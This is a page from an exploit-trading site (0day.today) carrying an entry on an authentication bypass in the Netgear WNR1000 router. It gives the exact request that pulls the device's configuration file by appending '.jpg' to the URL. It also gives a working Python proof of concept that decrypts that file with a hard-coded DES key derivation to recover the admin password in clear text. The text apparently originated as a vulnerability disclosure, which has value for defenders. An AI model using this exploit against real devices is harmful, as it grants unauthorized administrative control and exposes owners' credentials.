0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Netgear WNR1000 - Authentication Bypass

Author

Roberto Paleari

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

The web server running on the affected devices is subject to an authentication
bypass issue that allows attacker to gain administrative access, circumventing
existing authentication mechanisms.
 
Strictly speaking, the web server skips authentication checks for some URLs,
such as those that contain the substring ".jpg" (without quotes). As a
consequence, an attacker can retrieve the current device configuration by
accessing the following URL:
 
http://<target-ip-address>/NETGEAR_fwpt.cfg?.jpg
 
The resulting configuration file is encrypted. However the device implements a
trivial encryption scheme, that can be reversed quite easily.  From the
configuration file, attackers can extract, among the other things, the
clear-text password for the "admin" user.
 
A Python procedure that implements the aforementioned encryption scheme
follows (the code of this PoC is inefficient and is quite a mess):
 
<cut>
import pyDes
import os, sys
 
# Encryption key is a slightly variation of "NtgrBak"
KEY = [0x56-8, 0x74, 0x67, 0x72, 0x42, 0x61, 0x6b, 0x00]
 
def derive_des_key(ascii_key):
    def extract_by_offset(offset):
        byte_index = offset >> 3
        bit_index  = byte_index << 3
 
        v0 = (ascii_key[byte_index] << 8) | ascii_key[byte_index+1]
        v1 = 8 - (offset - bit_index)
        v0 >>= v1
        return v0 & 0xfe
 
    k = ""
    for i in range(0, 7*8, 7):
        k += chr(extract_by_offset(i))
    return k
 
def decrypt_block(block, key_bytes):
    k = derive_des_key(key_bytes)
    des = pyDes.des(k, pyDes.ECB)
    r = des.decrypt(block)
    return r
 
def main():
    data = sys.stdin.read()
    assert (len(data) % 8) == 0
 
    current_key = KEY[:]
 
    r = ""
    for i in range(0, len(data), 8):
        current_key[0] += 8
        if current_key[0] > 0xff:
            current_key[0] = current_key[0] - 0x100
            current_key[1] += 1
 
        block = data[i:i+8]
        d = decrypt_block(block, current_key)
 
        r += d
 
    sys.stdout.write(r)
</cut>

#  0day.today [2024-09-28]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Netgear WNR1000 - Authentication Bypass

Report Error

Report Error